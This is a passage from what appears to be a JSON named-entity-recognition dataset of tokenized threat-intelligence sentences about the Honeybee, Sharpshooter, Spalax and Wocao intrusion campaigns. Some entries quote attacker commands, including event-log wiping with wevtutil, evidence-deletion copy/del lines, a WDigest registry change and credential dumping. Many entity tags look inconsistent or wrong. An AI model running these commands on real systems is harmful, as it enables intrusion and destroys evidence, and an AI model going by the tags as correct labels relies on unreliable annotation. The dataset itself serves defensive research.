"Honeybee,", "the", "threat", "actors", "uses", "zip", "to", "pack", "collected", "files", "before", "exfiltration." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "used", "the", "malicious", "NTWDBLIB.DLL", "and", "`cliconfig.exe`", "to", "bypass", "UAC", "protections." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "deployed", "the", "MaoCheng", "dropper", "with", "a", "stolen", "Adobe", "Systems", "digital", "signature." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "collected", "data", "from", "compromised", "hosts." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "malicious", "files", "were", "decoded", "prior", "to", "execution." ], "ner_tags": [ "O", "I-OffAct", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Honeybee,", "the", "threat", "actors", "stole", "a", "digital", "signature", "from", "Adobe", "Systems", "to", "use", "with", "their", "MaoCheng", "dropper." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "threat", "actors", "registered", "domains", "for", "C2." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "attackers", "created", "email", "addresses", "to", "register", "for", "a", "free", "account", "for", "a", "control", "server", "used", "for", "the", "implants." ], "ner_tags": [ "O", "I-OffAct", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "used", "Base64", "to", "encode", "files", "with", "a", "custom", "key." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "uploaded", "stolen", "files", "to", "their", "C2", "servers." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "used", "batch", "files", "that", "reduced", "their", "fingerprint", "on", "a", "compromised", "system", "by", "deleting", "malware-related", "files." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "had", "the", "ability", "to", "use", "FTP", "for", "C2." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "used", "a", "malicious", "DLL", "to", "search", "for", "files", "with", "specific", "keywords." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "downloaded", "additional", "malware", "and", "malicious", "scripts", "onto", "a", "compromised", "host." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "stolen", "data", "was", "copied", "into", "a", "text", "file", "using", "the", "format", "`From", "<COMPUTER-NAME>", "(<Month>-<Day>", "<Hour>-<Minute>-<Second>).txt`", "prior", "to", "compression,", "encoding,", "and", "exfiltration." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "threat", "actors", "relied", "on", "a", "victim", "to", "enable", "macros", "within", "a", "malicious", "Word", "document." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "modified", "the", "MaoCheng", "dropper", "so", "its", "icon", "appeared", "as", "a", "Word", "document." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "I-SamFile", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "used", "a", "legitimate", "Windows", "executable", "and", "secure", "directory", "for", "their", "payloads", "to", "bypass", "UAC." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "used", "batch", "files", "that", "modified", "registry", "keys." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "deployed", "malware", "that", "used", "API", "calls,", "including", "`CreateProcessAsUser`." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "obtained", "a", "list", "of", "running", "processes", "on", "a", "victim", "machine", "using", "`cmd", "/c", "tasklist", ">", "%temp%\\temp.ini`." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "For", "Operation", "Honeybee,", "at", "least", "one", "identified", "persona", "was", "used", "to", "register", "for", "a", "free", "account", "for", "a", "control", "server." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "threat", "actors", "ran", "<code>sc", "start</code>", "to", "start", "the", "COMSysApp", "as", "part", "of", "the", "service", "hijacking", "and", "<code>sc", "stop</code>", "to", "stop", "and", "reconfigure", "the", "COMSysApp." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "used", "a", "batch", "file", "that", "modified", "the", "COMSysApp", "service", "to", "load", "a", "malicious", "ipnet.dll", "payload", "and", "to", "load", "a", "DLL", "into", "the", "`svchost.exe`", "process." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "the", "threat", "actors", "collected", "the", "computer", "name,", "OS,", "and", "other", "system", "information", "using", "`cmd", "/c", "systeminfo", ">", "%temp%\\", "temp.ini`." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile" ] }, { "tokens": [ "For", "Operation", "Honeybee,", "the", "threat", "actors", "used", "a", "Visual", "Basic", "script", "embedded", "within", "a", "Word", "document", "to", "download", "an", "implant." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "B-Tool", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "various", "implants", "used", "batch", "scripting", "and", "`cmd.exe`", "for", "execution." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "I-Way", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "During", "Operation", "Honeybee,", "threat", "actors", "installed", "DLLs", "and", "backdoors", "as", "Windows", "services." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Sharpshooter,", "threat", "actors", "sent", "malicious", "Word", "OLE", "documents", "to", "victims." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-SamFile", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Sharpshooter,", "additional", "payloads", "were", "downloaded", "after", "a", "target", "was", "infected", "with", "a", "first-stage", "downloader." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Sharpshooter,", "the", "threat", "actors", "relied", "on", "victims", "executing", "malicious", "Microsoft", "Word", "or", "PDF", "files." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "For", "Operation", "Sharpshooter,", "the", "threat", "actors", "used", "the", "Rising", "Sun", "modular", "backdoor." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "During", "Operation", "Sharpshooter,", "threat", "actors", "installed", "Rising", "Sun", "in", "the", "Startup", "folder", "and", "disguised", "it", "as", "`mssync.exe`." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "During", "Operation", "Sharpshooter,", "the", "first", "stage", "downloader", "resolved", "various", "Windows", "libraries", "and", "APIs,", "including", "`LoadLibraryA()`,", "`GetProcAddress()`,", "and", "`CreateProcessA()`." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Way", "O", "B-SamFile" ] }, { "tokens": [ "During", "Operation", "Sharpshooter,", "threat", "actors", "leveraged", "embedded", "shellcode", "to", "inject", "a", "downloader", "into", "the", "memory", "of", "Word." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "For", "Operation", "Sharpshooter,", "the", "threat", "actors", "used", "the", "ExpressVPN", "service", "to", "hide", "their", "location." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Sharpshooter,", "a", "first-stage", "downloader", "installed", "Rising", "Sun", "to", "`%Startup%\\mssync.exe`", "on", "a", "compromised", "host." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Sharpshooter,", "the", "threat", "actors", "compromised", "a", "server", "they", "used", "as", "part", "of", "the", "campaign's", "infrastructure." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "O" ] }, { "tokens": [ "For", "Operation", "Sharpshooter,", "the", "threat", "actors", "staged", "malicious", "files", "on", "Dropbox", "and", "other", "websites." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Sharpshooter,", "the", "threat", "actors", "used", "a", "VBA", "macro", "to", "execute", "a", "simple", "downloader", "that", "installed", "Rising", "Sun." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "I-HackOrg", "O" ] }, { "tokens": [ "For", "Operation", "Sharpshooter,", "the", "threat", "actors", "used", "Dropbox", "to", "host", "lure", "documents", "and", "their", "first-stage", "downloader." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "used", "Nullsoft", "Scriptable", "Install", "System", "(NSIS)", "scripts", "to", "install", "malware." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "used", "a", "variety", "of", "packers", "and", "droppers", "to", "decrypt", "malicious", "payloads." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "registered", "hundreds", "of", "domains", "using", "Duck", "DNS", "and", "DNS", "Exit." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "used", "dynamic", "DNS", "services,", "including", "Duck", "DNS", "and", "DNS", "Exit,", "as", "part", "of", "their", "C2", "infrastructure." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "used", "XOR-encrypted", "payloads." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "Operation", "Spalax,", "the", "threat", "actors", "relied", "on", "a", "victim", "to", "open", "a", "PDF", "document", "and", "click", "on", "an", "embedded", "malicious", "link", "to", "download", "malware." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Spalax,", "the", "threat", "actors", "relied", "on", "a", "victim", "to", "click", "on", "a", "malicious", "link", "distributed", "via", "phishing", "emails." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "obtained", "malware,", "including", "Remcos,", "njRAT,", "and", "AsyncRAT." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Spalax,", "the", "threat", "actors", "used", "`rundll32.exe`", "to", "execute", "malicious", "installers." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "used", "a", "variety", "of", "packers,", "including", "CyaX,", "to", "obfuscate", "malicious", "executables." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Spalax,", "the", "threat", "actors", "sent", "phishing", "emails", "that", "included", "a", "PDF", "document", "that", "in", "some", "cases", "led", "to", "the", "download", "and", "execution", "of", "malware." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "I-Way", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Spalax,", "the", "threat", "actors", "sent", "phishing", "emails", "to", "victims", "that", "contained", "a", "malicious", "link." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "used", "packers", "that", "read", "pixel", "data", "from", "images", "contained", "in", "PE", "files'", "resource", "sections", "and", "build", "the", "next", "layer", "of", "execution", "from", "the", "data." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "obtained", "packers", "such", "as", "CyaX." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "For", "Operation", "Spalax,", "the", "threat", "actors", "staged", "malware", "and", "malicious", "files", "in", "legitimate", "hosting", "services", "such", "as", "OneDrive", "or", "MediaFire." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Spalax,", "the", "threat", "actors", "used", "droppers", "that", "would", "run", "anti-analysis", "checks", "before", "executing", "malware", "on", "a", "compromised", "host." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Spalax,", "the", "threat", "actors", "used", "OneDrive", "and", "MediaFire", "to", "host", "payloads." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "archived", "collected", "files", "with", "WinRAR,", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors'", "proxy", "implementation", "\"Agent\"", "upgraded", "the", "socket", "in", "use", "to", "a", "TLS", "socket." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "a", "script", "to", "collect", "information", "about", "the", "infected", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "the", "threat", "actors", "deleted", "all", "Windows", "system", "and", "security", "event", "logs", "using", "`/Q", "/c", "wevtutil", "cl", "system`", "and", "`/Q", "/c", "wevtutil", "cl", "security`." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "collected", "clipboard", "data", "in", "plaintext." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "executed", "PowerShell", "commands", "which", "were", "encoded", "or", "compressed", "using", "Base64,", "zlib,", "and", "XOR." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "Mimikatz's", "DCSync", "to", "dump", "credentials", "from", "the", "memory", "of", "the", "targeted", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "B-Way", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "encrypted", "IP", "addresses", "used", "for", "\"Agent\"", "proxy", "hops", "with", "RC4." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "exfiltrated", "files", "and", "directories", "of", "interest", "from", "the", "targeted", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "PowerShell", "to", "add", "and", "delete", "rules", "in", "the", "Windows", "firewall." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "the", "`net`", "command", "to", "retrieve", "information", "about", "domain", "accounts." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "domain", "credentials,", "including", "domain", "admin,", "for", "lateral", "movement", "and", "privilege", "escalation." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "B-HackOrg", "O", "I-Way", "O", "O", "I-Way", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "For", "Operation", "Wocao,", "the", "threat", "actors", "registered", "email", "accounts", "to", "use", "during", "the", "campaign." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "the", "XServer", "backdoor", "to", "exfiltrate", "data." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "B-SamFile", "B-Purp" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "gained", "initial", "access", "by", "exploiting", "vulnerabilities", "in", "JBoss", "webservers." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "stolen", "credentials", "to", "connect", "to", "the", "victim's", "network", "via", "VPN." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Operation", "Wocao,", "the", "threat", "actors", "consistently", "removed", "traces", "of", "their", "activity", "by", "first", "overwriting", "a", "file", "using", "`/c", "cd", "/d", "c:\\windows\\temp\\", "&", "copy", "\\\\<IP", "ADDRESS>\\c$\\windows\\system32\\devmgr.dll", "\\\\<IP", "ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1", "/y`", "and", "then", "deleting", "the", "overwritten", "file", "using", "`/c", "cd", "/d", "c:\\windows\\temp\\", "&", "del", "\\\\<IP", "ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1`." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "gathered", "a", "recursive", "directory", "listing", "to", "find", "files", "and", "directories", "of", "interest." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "targeted", "people", "based", "on", "their", "organizational", "roles", "and", "privileges." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "edited", "variable", "names", "within", "the", "Impacket", "suite", "to", "avoid", "automated", "detection." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "downloaded", "additional", "files", "to", "the", "infected", "system." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "B-Way", "B-Features", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "proxied", "traffic", "through", "multiple", "infected", "systems." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "a", "Visual", "Basic", "script", "that", "checked", "for", "internet", "connectivity." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "PowerSploit's", "`Invoke-Kerberoast`", "module", "to", "request", "encrypted", "service", "tickets", "and", "bruteforce", "the", "passwords", "of", "Windows", "service", "accounts", "offline." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "obtained", "the", "password", "for", "the", "victim's", "password", "manager", "via", "a", "custom", "keylogger." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "ProcDump", "to", "dump", "credentials", "from", "memory." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "SMB", "to", "copy", "files", "to", "and", "from", "target", "systems." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "local", "account", "credentials", "found", "during", "the", "intrusion", "for", "lateral", "movement", "and", "privilege", "escalation." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "staged", "archived", "files", "in", "a", "temporary", "directory", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "the", "command", "`net", "localgroup", "administrators`", "to", "list", "all", "administrators", "part", "of", "a", "local", "group." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "developed", "their", "own", "custom", "webshells", "to", "upload", "to", "compromised", "servers." ], "ner_tags": [ "O", "I-OffAct", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "the", "threat", "actors", "renamed", "some", "tools", "and", "executables", "to", "appear", "as", "legitimate", "programs." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "the", "threat", "actors", "enabled", "Wdigest", "by", "changing", "the", "`HKLM\\SYSTEM\\\\ControlSet001\\\\Control\\\\SecurityProviders\\\\WDigest`", "registry", "value", "from", "0", "(disabled)", "to", "1", "(enabled)." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Operation", "Wocao,", "threat", "actors", "used", "a", "custom", "collection", "method", "to", "intercept", "two-factor", "authentication", "soft", "tokens." ], "ner_tags": [ "O", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 